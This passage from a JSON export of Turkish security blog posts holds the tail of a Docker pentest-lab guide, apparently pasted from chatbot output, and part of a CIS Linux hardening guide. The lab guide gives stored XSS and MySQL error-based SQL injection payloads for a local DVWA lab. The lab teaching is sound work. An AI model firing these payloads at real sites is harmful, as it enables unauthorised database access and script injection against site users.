class='comment'&gt;&lt;b&gt;attacker&lt;\/b&gt;: &lt;script&gt;alert('STOREDXSS')&lt;\/script&gt;&lt;\/div&gt;...<\/code>&rdquo;.<\/p>\r\n<\/li>\r\n<\/ul>\r\n<hr>\r\n<h2>5) SQLi &mdash; Burp Repeater ile tam ad\u0131m (boolean \/ error-based)<\/h2>\r\n<p>Ad\u0131m ad\u0131m (kopya-yap\u0131\u015ft\u0131r):<\/p>\r\n<ol>\r\n<li>\r\n<p>Proxy ayarla, DVWA'da oturum a&ccedil;, security=low.<\/p>\r\n<\/li>\r\n<li>\r\n<p>Target &rarr; Proxy &rarr; HTTP history se&ccedil; ve hedef form iste\u011fini yakala. \u0130ste\u011fi Repeater&rsquo;a g&ouml;nder.<\/p>\r\n<\/li>\r\n<li>\r\n<p>Repeater&rsquo;de payload testleri:<\/p>\r\n<\/li>\r\n<\/ol>\r\n<ul>\r\n<li>\r\n<p>Basit boolean test:<\/p>\r\n<\/li>\r\n<\/ul>\r\n<pre><code>id=1' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) -- -\r\n<\/code><\/pre>\r\n<p>(Bu biraz karma\u015f\u0131k; hata tabanl\u0131 retrievel i&ccedil;in kullan\u0131l\u0131r &mdash; sqlmap otomatik yapar. Manuel i&ccedil;in daha basit boolean payload&rsquo;lar\u0131 tercih et.)<\/p>\r\n<ul>\r\n<li>\r\n<p>Hata tabanl\u0131 test (MySQL i&ccedil;in):<\/p>\r\n<\/li>\r\n<\/ul>\r\n<pre><code>id=1' AND extractvalue(1,concat(0x7e,(select database()),0x7e)) -- -\r\n<\/code><\/pre>\r\n<p>Beklenen: HTML veya hata mesaj\u0131 i&ccedil;inde veritaban\u0131 ad\u0131 g&ouml;r&uuml;n&uuml;r.<\/p>\r\n<hr>\r\n<h1>E &mdash; Beklenen &ldquo;ekran g&ouml;r&uuml;nt&uuml;s&uuml;&rdquo; (metin \u015feklinde &ouml;rnekler)<\/h1>\r\n<p>Sana ger&ccedil;ek PNG g&ouml;nderemiyorum; bunun yerine blog\/raporuna koyabilece\u011fin <strong>metin tabanl\u0131 ekran g&ouml;r&uuml;nt&uuml;s&uuml; a&ccedil;\u0131klamalar\u0131<\/strong> haz\u0131rlad\u0131m &mdash; bu a&ccedil;\u0131klamalar\u0131 g&ouml;rsel alt\u0131 a&ccedil;\u0131klamas\u0131 (caption) olarak kullan:<\/p>\r\n<ol>\r\n<li>\r\n<p><code>01-novnc-burp-home.txt<\/code><\/p>\r\n<ul>\r\n<li>\r\n<p>A&ccedil;\u0131klama: &ldquo;noVNC ile eri\u015filen Burp GUI ana ekran\u0131. Sol men&uuml;: Proxy, Target, Repeater; ortada Intercept a&ccedil;\u0131k.&rdquo;<\/p>\r\n<\/li>\r\n<\/ul>\r\n<\/li>\r\n<li>\r\n<p><code>02-repeater-sqli-response.txt<\/code><\/p>\r\n<ul>\r\n<li>\r\n<p>A&ccedil;\u0131klama: &ldquo;Repeater yan\u0131t\u0131: HTML g&ouml;vdesinde &lsquo;SQL syntax error&rsquo; ve veritaban\u0131 sat\u0131rlar\u0131na dair i&ccedil;erik.&rdquo;<\/p>\r\n<\/li>\r\n<\/ul>\r\n<\/li>\r\n<li>\r\n<p><code>03-repeater-xss-alert.txt<\/code><\/p>\r\n<ul>\r\n<li>\r\n<p>A&ccedil;\u0131klama: &ldquo;Taray\u0131c\u0131da g&ouml;r&uuml;len alert popup: &lsquo;XSS&rsquo; &mdash; payload taray\u0131c\u0131da &ccedil;al\u0131\u015ft\u0131.&rdquo;<\/p>\r\n<\/li>\r\n<\/ul>\r\n<\/li>\r\n<li>\r\n<p><code>04-sqlmap-dump.txt<\/code><\/p>\r\n<ul>\r\n<li>\r\n<p>A&ccedil;\u0131klama: &ldquo;sqlmap &ccedil;\u0131kt\u0131s\u0131: &lsquo;Database: dvwa&rsquo; ve &lsquo;Table: users&rsquo; listesi, dump edilmi\u015f kullan\u0131c\u0131 sat\u0131rlar\u0131.&rdquo;<\/p>\r\n<\/li>\r\n<\/ul>\r\n<\/li>\r\n<\/ol>\r\n<p>Bu metin a&ccedil;\u0131klamalar\u0131 hem blog hem rapor k\u0131sm\u0131nda g&ouml;rsel alt\u0131 a&ccedil;\u0131klamas\u0131 olarak kullan\u0131labilir.<\/p>\r\n<hr>\r\n<h1>F &mdash; Ek ipu&ccedil;lar\u0131, sorun giderme ve g&uuml;venlik<\/h1>\r\n<ul>\r\n<li>\r\n<p><strong>noVNC ba\u011flant\u0131 ba\u015far\u0131s\u0131zsa:<\/strong> container loglar\u0131n\u0131 kontrol et <code>docker logs attacker_gui<\/code> ve <code>websockify<\/code> ar\u0131zalar\u0131n\u0131 ara.<\/p>\r\n<\/li>\r\n<li>\r\n<p><strong>Burp portu g&ouml;r&uuml;nm&uuml;yor:<\/strong> Burp GUI&rsquo;de Proxy &rarr; Options &rarr; Listener <code>0.0.0.0:8080<\/code> ekledi\u011finden emin ol. Docker-compose ports b&ouml;l&uuml;m&uuml;nde <code>8080:8080<\/code> maplenmeli.<\/p>\r\n<\/li>\r\n<li>\r\n<p><strong>CA sertifika:<\/strong> HTTPS intercept i&ccedil;in Burp CA&rsquo;y\u0131 host taray\u0131c\u0131ya y&uuml;kle (geli\u015ftirme\/test only).<\/p>\r\n<\/li>\r\n<li>\r\n<p><strong>A\u011f izolasyonu:<\/strong> Laboratuvar\u0131 sadece <code>web-lab<\/code> bridge i&ccedil;inde tut; e\u011fer internete a&ccedil;mak istemiyorsan <code>ports:<\/code> maplemelerini kald\u0131r veya host firewall ile k\u0131s\u0131tla.<\/p>\r\n<\/li>\r\n<li>\r\n<p><strong>Parola g&uuml;venli\u011fi:<\/strong> Bu image&rsquo;ler test ama&ccedil;l\u0131d\u0131r; VNC \u015fifresi yok &mdash; yaln\u0131zca yerelde\/izole ortamda kullan.<\/p>\r\n<\/li>\r\n<\/ul>\r\n<hr>\r\n<h1>G &mdash; K\u0131sa &ccedil;al\u0131\u015fma &ouml;rne\u011fi (ad\u0131m ad\u0131m &ouml;zet &mdash; h\u0131zl\u0131 start)<\/h1>\r\n<ol>\r\n<li>\r\n<p><code>burpsuite.jar<\/code> dosyan\u0131 ayn\u0131 klas&ouml;re koy (opsiyonel).<\/p>\r\n<\/li>\r\n<li>\r\n<p><code>Dockerfile.gui<\/code>, <code>entrypoint-gui.sh<\/code>, <code>docker-compose.yml<\/code> ayn\u0131 klas&ouml;rde olsun.<\/p>\r\n<\/li>\r\n<li>\r\n<p>Build &amp; run:<\/p>\r\n<\/li>\r\n<\/ol>\r\n<pre><code class=\"language-bash\">docker-compose build attacker_gui\r\ndocker-compose up -d\r\n<\/code><\/pre>\r\n<ol start=\"4\">\r\n<li>\r\n<p>noVNC ile GUI&rsquo;ye ba\u011flan: <code>http:\/\/localhost:6080<\/code><\/p>\r\n<\/li>\r\n<li>\r\n<p>Burp GUI a&ccedil;\u0131ld\u0131ysa: Proxy &rarr; Options &rarr; Add listener &rarr; Interface: <code>0.0.0.0<\/code>, Port: <code>8080<\/code><\/p>\r\n<\/li>\r\n<li>\r\n<p>Host taray\u0131c\u0131n\u0131 <code>127.0.0.1:8080<\/code> proxy olarak ayarla. (\u0130stersen devtools &gt; network &uuml;zerinden do\u011frudan test et.)<\/p>\r\n<\/li>\r\n<li>\r\n<p>DVWA&rsquo;ye (<a href=\"http:\/\/localhost:8081\/\">http:\/\/localhost:8081<\/a>) gir, oturum a&ccedil;, Repeater ile yukar\u0131daki SQLi\/XSS isteklerini &ccedil;al\u0131\u015ft\u0131r.<\/p>\r\n<\/li>\r\n<\/ol>\r\n<hr>\r\n<h1>H &mdash; Son notlar &amp; &ouml;neriler<\/h1>\r\n<ul>\r\n<li>\r\n<p>\u0130stersen bu imaj\u0131n VNC i&ccedil;in <strong>basit parola<\/strong> ekleyen ve noVNC login ekran\u0131 olan bir s&uuml;r&uuml;m&uuml;n&uuml; haz\u0131rlay\u0131p g&ouml;ndereyim &mdash; g&uuml;venlik i&ccedil;in iyi olur.<\/p>\r\n<\/li>\r\n<li>\r\n<p>Burp jar&rsquo;\u0131n\u0131 kendin koyduktan sonra ben sana tam olarak <code>docker-compose<\/code> build arg&rsquo;lar\u0131 ve &ouml;rnek Burp config ad\u0131mlar\u0131n\u0131 (CA export, Proxy listener preset script) haz\u0131rlayay\u0131m.<\/p>\r\n<\/li>\r\n<li>\r\n<p>Ayr\u0131ca istersen Repeater i&ccedil;in <strong>tam ekranl\u0131 &ouml;rnek istek\/yan\u0131t loglar\u0131n\u0131<\/strong> (plain text) &uuml;retip blog i&ccedil;inde g&ouml;sterilecek \u015fekilde formatlayay\u0131m.<\/p>\r\n<\/li>\r\n<\/ul>\r\n<p>Hangi eklemeyi hemen yapay\u0131m? (&ouml;r. VNC parola + noVNC login, veya Burp CA export ad\u0131mlar\u0131n\u0131n otomatikle\u015ftirilmesi).<\/p>","excerpt":"Docker ile pentest laboratuvar\u0131 kurmak: hafif, h\u0131zl\u0131 ve ta\u015f\u0131nabilir. Sald\u0131rgan makine (Kali), hedef uygulamalar (Juice Shop, DVWA, bWAPP, WebGoat) ve tek bir docker-compose a\u011f\u0131 ile izole, tekrar \u00fcretilebilir bir \u00f6\u011frenme ortam\u0131 olu\u015fturun.","created_at":"2025-07-06 20:42:31","updated_at":"2026-09-07 18:24:59","category_id":7,"view_count":1163,"reading_time":31,"status":"published","editor_choice":0,"is_editor_choice":0,"published_at":"2025-07-06 20:42:31","featured_image":"resimyok.jpg","slug":"docker-ile-web-uygulama-pentest-laboratuvari-kurma","category_name":"Cyber Security","category_slug":"cyber-security","category_color":"#10b981"},{"id":50,"title":"Her Linux Sunucumda Uygulad\u0131\u011f\u0131m 7 CIS G\u00fcvenlik Uygulamas\u0131","content":"<p>Linux sunucu g&uuml;venli\u011fi konusunda 15+ y\u0131ll\u0131k deneyimim boyunca &ouml;\u011frendi\u011fim en &ouml;nemli \u015fey \u015fu: <strong>Varsay\u0131lan konfig&uuml;rasyonlar hi&ccedil;bir zaman yeterli de\u011fildir<\/strong>. Her yeni Linux sunucu kurdu\u011fumda, sistemi &uuml;retime almadan &ouml;nce mutlaka uygulad\u0131\u011f\u0131m 7 temel CIS (Center for Internet Security) g&uuml;venlik prati\u011fi var. Bu yaz\u0131da, bu uygulamalar\u0131 neden kritik buldu\u011fumu ve nas\u0131l hayata ge&ccedil;irdi\u011fimi anlataca\u011f\u0131m.<\/p>\r\n<h2>CIS Benchmarks Nedir ve Neden &Ouml;nemlidir?<\/h2>\r\n<p>CIS Benchmarks, d&uuml;nyan\u0131n d&ouml;rt bir yan\u0131ndan siber g&uuml;venlik uzmanlar\u0131n\u0131n consensus esasl\u0131 katk\u0131lar\u0131yla geli\u015ftirilmi\u015f, kapsaml\u0131 g&uuml;venlik konfig&uuml;rasyon rehberleridir. CIS standardlar\u0131n\u0131n bilinen g&uuml;venlik a&ccedil;\u0131klar\u0131n\u0131n %80-95'ini eliminate etti\u011fi kan\u0131tlanm\u0131\u015ft\u0131r. <strong>CIS Benchmarks'in Temel Prensipleri:<\/strong><\/p>\r\n<ul>\r\n<li><strong>Consensus-driven<\/strong>: Uzmanlar\u0131n ortakla\u015fa g&ouml;r&uuml;\u015f&uuml;yle geli\u015ftirilir<\/li>\r\n<li><strong>Vendor-neutral<\/strong>: Belirli bir &uuml;reticiye ba\u011fl\u0131 de\u011fildir<\/li>\r\n<li><strong>Level 1 ve Level 2<\/strong>: Temel ve ileri seviye g&uuml;venlik konfig&uuml;rasyonlar\u0131<\/li>\r\n<li><strong>Scored ve Not Scored<\/strong>: Zorunlu ve opsiyonel kontroller<\/li>\r\n<\/ul>\r\n<h2>1. SSH Sertle\u015ftirme: \u0130lk Savunma Hatt\u0131<\/h2>\r\n<p>SSH, Linux sunuculara eri\u015fimin temel y&ouml;ntemi oldu\u011fu i&ccedil;in sertle\u015ftirme s&uuml;recimin en kritik par&ccedil;as\u0131d\u0131r.<\/p>\r\n<h3>Temel SSH Yap\u0131land\u0131rmas\u0131<\/h3>\r\n<pre><code># SSH konfig&uuml;rasyon dosyas\u0131n\u0131 d&uuml;zenle sudo nano \/etc\/ssh\/sshd_config # Kritik ayarlar: Protocol 2 # Sadece SSH v2 kullan PermitRootLogin no # Root kullan\u0131c\u0131s\u0131n\u0131n SSH eri\u015fimini engelle PasswordAuthentication no # Parola tabanl\u0131 giri\u015fi devre d\u0131\u015f\u0131 b\u0131rak PubkeyAuthentication yes # Public key authentication aktif et Port 2222 # Varsay\u0131lan port de\u011fi\u015ftir MaxAuthTries 3 # Maksimum deneme say\u0131s\u0131n\u0131 s\u0131n\u0131rla MaxSessions 4 # E\u015fzamanl\u0131 oturum say\u0131s\u0131n\u0131 s\u0131n\u0131rla LoginGraceTime 30 # Giri\u015f s&uuml;resi s\u0131n\u0131r\u0131 AllowUsers your_username # Sadece belirli kullan\u0131c\u0131lara izin ver ClientAliveInterval 300 # \u0130naktif ba\u011flant\u0131lar\u0131 sonland\u0131r ClientAliveCountMax 2 # Maksimum hayatta kalma kontrol&uuml; HostBasedAuthentication no # Host tabanl\u0131 kimlik do\u011frulamay\u0131 devre d\u0131\u015f\u0131 b\u0131rak IgnoreRhosts yes # .rhosts dosyalar\u0131n\u0131 yoksay <\/code><\/pre>\r\n<h3>G&uuml;&ccedil;l&uuml; SSH Key Olu\u015fturma<\/h3>\r\n<pre><code># RSA 4096 bit key olu\u015ftur ssh-keygen -t rsa -b 4096 -C \"your_email@example.com\" # ED25519 (&ouml;nerilen - daha g&uuml;venli ve h\u0131zl\u0131) ssh-keygen -t ed25519 -C \"your_email@example.com\" # SSH directory g&uuml;venli\u011fini sa\u011fla chmod 700 ~\/.ssh chmod 600 ~\/.ssh\/authorized_keys chmod 600 ~\/.ssh\/id_rsa chmod 644 ~\/.ssh\/id_rsa.pub <\/code><\/pre>\r\n<h3>SSH Monitoring ve Fail2Ban<\/h3>\r\n<pre><code># Fail2Ban kurulumu sudo apt install fail2ban -y # SSH i&ccedil;in jail konfig&uuml;rasyonu sudo nano \/etc\/fail2ban\/jail.local enabled = true port = 2222 filter = sshd logpath = \/var\/log\/auth.log maxretry = 3 bantime = 3600 findtime = 600 sudo systemctl enable fail2ban sudo systemctl start fail2ban <\/code><\/pre>\r\n<h2>2. Firewall Konfig&uuml;rasyonu: A\u011f Trafi\u011fi Kontrol&uuml;<\/h2>\r\n<p>CIS Controls, host-based firewall ile varsay\u0131lan-reddet kural\u0131n\u0131n uygulanmas\u0131n\u0131 &ouml;nermektedir.<\/p>\r\n<h3>UFW (Uncomplicated Firewall) Kurulumu<\/h3>\r\n<pre><code># UFW'yi aktif et sudo ufw enable # Varsay\u0131lan politikalar\u0131 ayarla sudo ufw default deny incoming sudo ufw default allow outgoing # Gerekli portlar\u0131 a&ccedil; sudo ufw allow 2222\/tcp # SSH (&ouml;zel port) sudo ufw allow 80\/tcp # HTTP sudo ufw allow 443\/tcp # HTTPS # Belirli IP'den SSH eri\u015fimi (opsiyonel) sudo ufw allow from 192.168.1.100 to any port 2222 # Rate limiting ile SSH brute force korumas\u0131 sudo ufw limit 2222\/tcp # UFW durumunu kontrol et sudo ufw status verbose <\/code><\/pre>\r\n<h3>\u0130leri Seviye iptables Kurallar\u0131<\/h3>\r\n<pre><code># Temel iptables konfig&uuml;rasyonu #!\/bin\/bash # Mevcut kurallar\u0131 temizle iptables -F iptables -X iptables -t nat -F iptables -t nat -X iptables -t mangle -F iptables -t mangle -X # Varsay\u0131lan politikalar iptables -P INPUT DROP iptables -P FORWARD DROP iptables -P OUTPUT ACCEPT # Loopback trafi\u011fine izin ver iptables -A INPUT -i lo -j ACCEPT iptables -A OUTPUT -o lo -j ACCEPT # Established ve related ba\u011flant\u0131lara izin ver iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT # SSH eri\u015fimi (rate limiting ile) iptables -A INPUT -p tcp --dport 2222 -m state --state NEW -m recent --set iptables -A INPUT -p tcp --dport 2222 -m state --state NEW -m recent --update --seconds 60 --hitcount 4 -j DROP iptables -A INPUT -p tcp --dport 2222 -j ACCEPT # Web servisleri iptables -A INPUT -p tcp --dport 80 -j ACCEPT iptables -A INPUT -p tcp --dport 443 -j ACCEPT # ICMP (ping) s\u0131n\u0131rl\u0131 izin iptables -A INPUT -p icmp --icmp-type echo-request -m limit --limit 1\/s -j ACCEPT # Kurallar\u0131 kaydet iptables-save &gt; \/etc\/iptables\/rules.v4 <\/code><\/pre>\r\n<h2>3. Kullan\u0131c\u0131 Hesap Y&ouml;netimi: Least Privilege Prensibi<\/h2>\r\n<h3>G&uuml;&ccedil;l&uuml; Parola Politikas\u0131<\/h3>\r\n<pre><code># PAM konfig&uuml;rasyonu ile parola karma\u015f\u0131kl\u0131\u011f\u0131 sudo nano \/etc\/pam.d\/common-password # \u015eu sat\u0131r\u0131 ekle: password requisite pam_pwquality.so retry=3 minlen=12 dcredit=-1 ucredit=-1 ocredit=-1 lcredit=-1 # Parola ge&ccedil;mi\u015fi kontrol&uuml; sudo nano \/etc\/pam.d\/common-password # \u015eu sat\u0131r\u0131 ekle: password required pam_pwhistory.so remember=5 # Hesap kilitleme politikas\u0131 sudo nano \/etc\/pam.d\/common-auth # \u015eu sat\u0131r\u0131 ekle: auth required pam_tally2.so deny=3 unlock_time=600 onerr=fail audit even_deny_root <\/code><\/pre>\r\n<h3>Sudo Konfig&uuml;rasyonu<\/h3>\r\n<pre><code># Sudo konfig&uuml;rasyonunu d&uuml;zenle sudo visudo # Kullan\u0131c\u0131 i&ccedil;in sudo izinleri your_username ALL=(ALL:ALL) ALL # Parola timeout ayar\u0131 Defaults passwd_timeout=5 # Sudo session timeout Defaults timestamp_timeout=15 # Sudo kullan\u0131m\u0131n\u0131 logla Defaults logfile=\"\/var\/log\/sudo.log\" Defaults log_input,log_output <\/code><\/pre>\r\n<h3>Gereksiz Kullan\u0131c\u0131 Hesaplar\u0131n\u0131 Temizleme<\/h3>\r\n<pre><code># Sistem kullan\u0131c\u0131lar\u0131n\u0131 kontrol et cat \/etc\/passwd | grep -v \"\/usr\/sbin\/nologin\\|\/bin\/false\" | cut -d: -f1 # Gereksiz hesaplar\u0131 devre d\u0131\u015f\u0131 b\u0131rak sudo usermod -L username # Hesab\u0131 kilitle sudo usermod -s \/bin\/false username # Shell eri\u015fimini engelle # Son giri\u015f tarihlerini kontrol et sudo lastlog | grep -v \"Never\" # Pasif hesaplar\u0131 tespit et sudo last | head -20 <\/code><\/pre>\r\n<h2>4. Sistem G&uuml;ncellemeleri ve Yamalar\u0131<\/h2>\r\n<h3>Otomatik G&uuml;venlik G&uuml;ncellemeleri<\/h3>\r\n<pre><code># Unattended upgrades kurulumu sudo apt install unattended-upgrades apt-listchanges -y # Konfig&uuml;rasyon sudo dpkg-reconfigure -plow unattended-upgrades # Manuel konfig&uuml;rasyon sudo nano \/etc\/apt\/apt.conf.d\/50unattended-upgrades # \u0130&ccedil;erik: Unattended-Upgrade::Allowed-Origins { \"${distro_id}:${distro_codename}-security\"; \"${distro_id}ESMApps:${distro_codename}-apps-security\"; \"${distro_id}ESM:${distro_codename}-infra-security\"; }; Unattended-Upgrade::AutoFixInterruptedDpkg \"true\"; Unattended-Upgrade::MinimalSteps \"true\"; Unattended-Upgrade::Remove-Unused-Dependencies \"true\"; Unattended-Upgrade::Automatic-Reboot \"false\"; # E-posta bildirimlerini aktif et Unattended-Upgrade::Mail \"admin@yourdomain.com\"; <\/code><\/pre>\r\n<h3>Manuel G&uuml;ncelleme Rutini<\/h3>\r\n<pre><code>#!\/bin\/bash # update_system.sh echo \"Sistem g&uuml;ncelleme ba\u015fl\u0131yor...\" # Paket listesini g&uuml;ncelle apt update # G&uuml;ncellenebilir paketleri listele apt list --upgradable # G&uuml;venlik g&uuml;ncellemelerini uygula apt upgrade -y # Sistem temizleme apt autoremove -y apt autoclean # Kernel g&uuml;ncellemesi kontrol&uuml; if ; then echo \"Sistem yeniden ba\u015flatma gerekiyor!\" echo \"Yeniden ba\u015flatma i&ccedil;in: sudo reboot\" fi echo \"G&uuml;ncelleme tamamland\u0131: $(date)\" <\/code><\/pre>\r\n<h2>5. Logging ve Monitoring: G&uuml;venlik Olaylar\u0131n\u0131 Yakalama<\/h2>\r\n<h3>Rsyslog Konfig&uuml;rasyonu<\/h3>\r\n<pre><code># Rsyslog konfig&uuml;rasyonu sudo nano \/etc\/rsyslog.conf # Uzak log g&ouml;nderimi i&ccedil;in (opsiyonel) *.* @@logserver.yourdomain.com:514 # Lokal log rotasyonu sudo nano \/etc\/logrotate.d\/rsyslog \/var\/log\/syslog { daily missingok rotate 52 compress delaycompress notifempty create 0640 syslog adm postrotate \/usr\/lib\/rsyslog\/rsyslog-rotate endscript } <\/code><\/pre>\r\n<h3>Auditd Kurulumu ve Konfig&uuml;rasyonu<\/h3>\r\n<pre><code># Auditd kurulumu sudo apt install auditd audispd-plugins -y # Auditd kurallar\u0131 sudo nano \/etc\/audit\/rules.d\/audit.rules # Kritik dosya de\u011fi\u015fikliklerini izle -w \/etc\/passwd -p wa -k passwd_changes -w \/etc\/shadow -p wa -k shadow_changes -w \/etc\/group -p wa -k group_changes -w \/etc\/sudoers -p wa -k sudoers_changes -w \/etc\/ssh\/sshd_config -p wa -k ssh_config_changes # Sistem &ccedil;a\u011fr\u0131lar\u0131n\u0131 izle -a always,exit -F arch=b64 -S adjtimex -S settimeofday -k time_change -a always,exit -F arch=b32 -S adjtimex -S settimeofday -S stime -k time_change # Network konfig&uuml;rasyon de\u011fi\u015fikliklerini izle -w \/etc\/issue -p wa -k system_locale -w \/etc\/issue.net -p wa -k system_locale -w \/etc\/hosts -p wa -k system_locale -w \/etc\/network\/ -p wa -k system_locale # Auditd'yi yeniden ba\u015flat sudo systemctl restart auditd sudo systemctl enable auditd <\/code><\/pre>\r\n<h3>Log Analizi Ara&ccedil;lar\u0131<\/h3>\r\n<pre><code># Logwatch kurulumu sudo apt install logwatch -y # G&uuml;nl&uuml;k rapor konfig&uuml;rasyonu sudo nano \/etc\/logwatch\/conf\/logwatch.conf Detail = High MailTo = admin@yourdomain.com MailFrom = logwatch@yourdomain.com Format = html Range = today # Manuel logwatch raporu sudo logwatch --detail high --mailto admin@yourdomain.com --format html --range today <\/code><\/pre>\r\n<h2>6. Servis Sertle\u015ftirme: Sald\u0131r\u0131 Y&uuml;zeyini Minimize Etme<\/h2>\r\n<h3>Gereksiz Servislerin Tespiti ve Devre D\u0131\u015f\u0131 B\u0131rak\u0131lmas\u0131<\/h3>\r\n<pre><code># &Ccedil;al\u0131\u015fan servisleri listele systemctl list-units --type=service --state=running # A&ccedil;\u0131k portlar\u0131 kontrol et sudo netstat -tulpn sudo ss -tulpn # Gereksiz servisleri devre d\u0131\u015f\u0131 b\u0131rak sudo systemctl disable telnet sudo systemctl disable ftp sudo systemctl disable rsh sudo systemctl disable rlogin sudo systemctl disable tftp sudo systemctl disable xinetd sudo systemctl disable sendmail # E\u011fer mail server de\u011filse # Servis durumlar\u0131n\u0131 kontrol et sudo systemctl is-enabled service_name sudo systemctl is-active service_name <\/code><\/pre>\r\n<h3>Web Server Sertle\u015ftirme (Apache\/Nginx)<\/h3>\r\n<h4>Apache Sertle\u015ftirme<\/h4>\r\n<pre><code># Apache g&uuml;venlik mod&uuml;l&uuml; sudo a2enmod security2 sudo a2enmod headers sudo a2enmod ssl # G&uuml;venlik konfig&uuml;rasyonu sudo nano \/etc\/apache2\/conf-available\/security.conf # \u0130&ccedil;erik: ServerTokens Prod ServerSignature Off TraceEnable Off # G&uuml;venlik ba\u015fl\u0131klar\u0131 Header always set X-Content-Type-Options nosniff Header always set X-Frame-Options DENY Header always set X-XSS-Protection \"1; mode=block\" Header always set Strict-Transport-Security \"max-age=63072000; includeSubDomains; preload\" Header always set Content-Security-Policy \"default-src 'self'\" # Konfig&uuml;rasyonu aktif et sudo a2enconf security sudo systemctl restart apache2 <\/code><\/pre>\r\n<h4>Nginx Sertle\u015ftirme<\/h4>\r\n<pre><code># Nginx g&uuml;venlik konfig&uuml;rasyonu sudo nano \/etc\/nginx\/nginx.conf # \u0130&ccedil;erik: server_tokens off; # SSL konfig&uuml;rasyonu ssl_protocols TLSv1.2 TLSv1.3; ssl_ciphers ECDHE-RSA-AES256-GCM-SHA512:DHE-RSA-AES256-GCM-SHA512:ECDHE-RSA-AES256-GCM-SHA384; ssl_prefer_server_ciphers off; # Rate limiting limit_req_zone $binary_remote_addr zone=login:10m rate=10r\/m; # G&uuml;venlik ba\u015fl\u0131klar\u0131 add_header X-Frame-Options \"SAMEORIGIN\" always; add_header X-XSS-Protection \"1; mode=block\" always; add_header X-Content-Type-Options \"nosniff\" always; add_header Referrer-Policy \"no-referrer-when-downgrade\" always; add_header Content-Security-Policy \"default-src 'self' http: https: data: blob: 'unsafe-inline'\" always; <\/code><\/pre>\r\n<h2>7. Dosya Sistemi G&uuml;venli\u011fi ve \u0130zinler<\/h2>\r\n<h3>Kritik Dosya \u0130zinlerinin Ayarlanmas\u0131<\/h3>\r\n<pre><code># Sistem dosya izinlerini kontrol et ve d&uuml;zelt sudo chmod 644 \/etc\/passwd sudo chmod 600 \/etc\/shadow sudo chmod 644 \/etc\/group sudo chmod 600 \/etc\/gshadow sudo chmod 600 \/etc\/ssh\/sshd_config sudo chmod 755 \/etc\/ssh # World-writable dosyalar\u0131 bul ve d&uuml;zelt find \/ -type f -perm -002 -exec ls -la {} \\; 2&gt;\/dev\/null find \/ -type d -perm -002 -exec ls -ld {} \\; 2&gt;\/dev\/null # SUID\/SGID dosyalar\u0131n\u0131 kontrol et find \/ -type f \\( -perm -4000 -o -perm -2000 \\) -exec ls -la {} \\; 2&gt;\/dev\/null # Sahibi olmayan dosyalar\u0131 bul find \/ -nouser -o -nogroup 2&gt;\/dev\/null <\/code><\/pre>\r\n<h3>Disk \u015eifreleme ve Mount G&uuml;venli\u011fi<\/h3>\r\n<pre><code># Fstab g&uuml;venlik ayarlar\u0131 sudo nano \/etc\/fstab # &Ouml;rnek g&uuml;venli mount opsisonlar\u0131: \/dev\/sda1 \/tmp ext4 defaults,nodev,nosuid,noexec 0 2 tmpfs \/dev\/shm tmpfs defaults,nodev,nosuid,noexec 0 0 # Dosya sistemi b&uuml;t&uuml;nl&uuml;k kontrol&uuml; (AIDE) sudo apt install aide -y # AIDE veritaban\u0131n\u0131 ba\u015flat sudo aide --init sudo mv \/var\/lib\/aide\/aide.db.new \/var\/lib\/aide\/aide.db # G&uuml;nl&uuml;k b&uuml;t&uuml;nl&uuml;k kontrol&uuml; i&ccedil;in cron job echo \"0 5 * * * root \/usr\/bin\/aide --check | mail -s 'AIDE Integrity Check' admin@yourdomain.com\" &gt;&gt; \/etc\/crontab <\/code><\/pre>\r\n<h2>Otomatik CIS Compliance Kontrolleri<\/h2>\r\n<h3>CIS-CAT Lite ile Automated Assessment<\/h3>\r\n<pre><code>#!\/bin\/bash # cis_assessment.sh # CIS-CAT Lite indir (&uuml;cretsiz versiyon) wget https:\/\/learn.cisecurity.org\/cis-cat-lite # Unzip ve &ccedil;al\u0131\u015ft\u0131r unzip cis-cat-lite.zip cd CIS-CAT-Lite\/ # Ubuntu 20.04 i&ccedil;in assessment &ccedil;al\u0131\u015ft\u0131r .\/CIS-CAT.sh -i -a -x -r \/opt\/cis-reports\/ # Raporu analiz et echo \"CIS Assessment tamamland\u0131. Rapor: \/opt\/cis-reports\/\" <\/code><\/pre>\r\n<h3>Lynis ile Security Auditing<\/h3>\r\n<pre><code># Lynis kurulumu sudo apt install lynis -y # Tam g&uuml;venlik denetimi sudo lynis audit system # Raporu incele sudo lynis show report # &Ouml;neriler i&ccedil;in: sudo lynis show suggestions <\/code><\/pre>\r\n<h2>S&uuml;rekli \u0130yile\u015ftirme ve Monitoring<\/h2>\r\n<h3>Haftal\u0131k G&uuml;venlik Kontrol&uuml; Scripti<\/h3>\r\n<pre><code>#!\/bin\/bash # weekly_security_check.sh echo \"=== Haftal\u0131k G&uuml;venlik Kontrol&uuml; ===\" echo \"Tarih: $(date)\" # 1. Sistem g&uuml;ncellemelerini kontrol et echo \"--- Mevcut G&uuml;ncellemeler ---\" apt list --upgradable # 2. Son giri\u015f yapan kullan\u0131c\u0131lar\u0131 kontrol et echo \"--- Son Kullan\u0131c\u0131 Giri\u015fleri ---\" last | head -10 # 3. Ba\u015far\u0131s\u0131z SSH giri\u015flerini kontrol et echo \"--- Ba\u015far\u0131s\u0131z SSH Giri\u015fleri ---\" grep \"Failed password\" \/var\/log\/auth.log | tail -10 # 4. A&ccedil;\u0131k portlar\u0131 kontrol et echo \"--- A&ccedil;\u0131k Portlar ---\" ss -tulpn # 5. Disk kullan\u0131m\u0131n\u0131 kontrol et echo \"--- Disk Kullan\u0131m\u0131 ---\" df -h # 6. Y&uuml;ksek CPU\/Memory kullan\u0131m\u0131n\u0131 kontrol et echo \"--- Sistem Kaynaklar\u0131 ---\" top -bn1 | head -20 # 7. Fail2Ban durumunu kontrol et echo \"--- Fail2Ban Durumu ---\" fail2ban-client status echo \"=== Kontrol Tamamland\u0131 ===\" <\/code><\/pre>\r\n<h2>Sonu&ccedil; ve Tavsiyeler<\/h2>\r\n<p>Bu 7 CIS g&uuml;venlik prati\u011fi, Linux sunucular\u0131n\u0131z\u0131n g&uuml;venlik seviyesini &ouml;nemli &ouml;l&ccedil;&uuml;de art\u0131racakt\u0131r. <strong>Ancak g&uuml;venlik bir hedef de\u011fil, s&uuml;rekli bir s&uuml;re&ccedil;tir<\/strong>.<\/p>\r\n<h3>Hat\u0131rlanmas\u0131 Gerekenler:<\/h3>\r\n<ol>\r\n<li><strong>Test 